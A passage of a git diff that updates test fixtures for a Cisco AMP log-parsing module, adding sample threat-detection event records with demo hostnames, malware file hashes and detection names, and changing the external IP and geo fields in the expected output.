+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669405052633000,"timestamp":1610705998,"timestamp_nanoseconds":847000000,"date":"2021-01-15T10:19:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669405052633129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":375000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595368","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":360000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669143059628000,"timestamp":1610705937,"timestamp_nanoseconds":968000000,"date":"2021-01-15T10:18:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669143059628070","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259286289613000,"timestamp":1610705905,"timestamp_nanoseconds":669000000,"date":"2021-01-15T10:18:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259286289612895","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259234750005000,"timestamp":1610705893,"timestamp_nanoseconds":657000000,"date":"2021-01-15T10:18:13+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259234750005342","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259183210398000,"timestamp":1610705881,"timestamp_nanoseconds":645000000,"date":"2021-01-15T10:18:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259183210397789","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180335966167761000,"timestamp":1610705878,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:17:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180335966167760897","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":653000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json
index 07b32280fdf1..6fc2752766aa 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json
@@ -3,7 +3,7 @@
 "@timestamp": "2021-01-15T11:59:52.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -130,7 +130,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -142,7 +142,7 @@
 "@timestamp": "2021-01-15T11:20:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -183,7 +183,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 12475,
+ "log.offset": 12480,
 "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454",
 "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
 "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
@@ -199,7 +199,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -215,7 +215,7 @@
 "@timestamp": "2021-01-15T11:20:06.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -256,7 +256,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 14116,
+ "log.offset": 14126,
 "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454",
 "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
 "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
@@ -272,7 +272,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -288,7 +288,7 @@
 "@timestamp": "2021-01-15T10:45:07.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -328,7 +328,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 15757,
+ "log.offset": 15772,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -339,7 +339,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -351,7 +351,7 @@
 "@timestamp": "2021-01-15T10:37:43.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -371,13 +371,6 @@
 "e1:e5:94:ea:a5:44"
 ],
 "cisco.amp.timestamp_nanoseconds": 978000000,
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "8.8.4.4",
 "destination.port": 443,
 "event.action": "DFC Threat Detected",
@@ -390,7 +383,7 @@
 "host.hostname": "Demo_Upatre",
 "host.name": "Demo_Upatre",
 "input.type": "log",
- "log.offset": 17081,
+ "log.offset": 17101,
 "network.direction": "egress",
 "network.transport": "TCP",
 "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454",
@@ -404,8 +397,8 @@
 "related.ip": [
 "10.10.0.0",
 "10.10.10.10",
- "8.8.4.4",
- "8.8.8.8"
+ "175.16.199.1",
+ "8.8.4.4"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -423,7 +416,7 @@
 "@timestamp": "2021-01-15T10:37:43.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -443,13 +436,6 @@
 "e1:e5:94:ea:a5:44"
 ],
 "cisco.amp.timestamp_nanoseconds": 978000000,
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "8.8.4.4",
 "destination.port": 443,
 "event.action": "DFC Threat Detected",
@@ -462,7 +448,7 @@
 "host.hostname": "Demo_Upatre",
 "host.name": "Demo_Upatre",
 "input.type": "log",
- "log.offset": 18534,
+ "log.offset": 18559,
 "network.direction": "egress",
 "network.transport": "TCP",
 "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454",
@@ -476,8 +462,8 @@
 "related.ip": [
 "10.10.0.0",
 "10.10.10.10",
- "8.8.4.4",
- "8.8.8.8"
+ "175.16.199.1",
+ "8.8.4.4"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -495,7 +481,7 @@
 "@timestamp": "2021-01-15T10:37:43.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -515,13 +501,6 @@
 "e1:e5:94:ea:a5:44"
 ],
 "cisco.amp.timestamp_nanoseconds": 947000000,
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "8.8.4.4",
 "destination.port": 443,
 "event.action": "DFC Threat Detected",
@@ -534,7 +513,7 @@
 "host.hostname": "Demo_Upatre",
 "host.name": "Demo_Upatre",
 "input.type": "log",
- "log.offset": 19987,
+ "log.offset": 20017,
 "network.direction": "egress",
 "network.transport": "TCP",
 "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454",
@@ -548,8 +527,8 @@
 "related.ip": [
 "10.10.0.0",
 "10.10.10.10",
- "8.8.4.4",
- "8.8.8.8"
+ "175.16.199.1",
+ "8.8.4.4"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -567,7 +546,7 @@
 "@timestamp": "2021-01-15T10:37:43.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -587,13 +566,6 @@
 "e1:e5:94:ea:a5:44"
 ],
 "cisco.amp.timestamp_nanoseconds": 931000000,
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "8.8.4.4",
 "destination.port": 443,
 "event.action": "DFC Threat Detected",
@@ -606,7 +578,7 @@
 "host.hostname": "Demo_Upatre",
 "host.name": "Demo_Upatre",
 "input.type": "log",
- "log.offset": 21440,
+ "log.offset": 21475,
 "network.direction": "egress",
 "network.transport": "TCP",
 "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454",
@@ -620,8 +592,8 @@
 "related.ip": [
 "10.10.0.0",
 "10.10.10.10",
- "8.8.4.4",
- "8.8.8.8"
+ "175.16.199.1",
+ "8.8.4.4"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -639,7 +611,7 @@
 "@timestamp": "2021-01-15T10:37:43.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
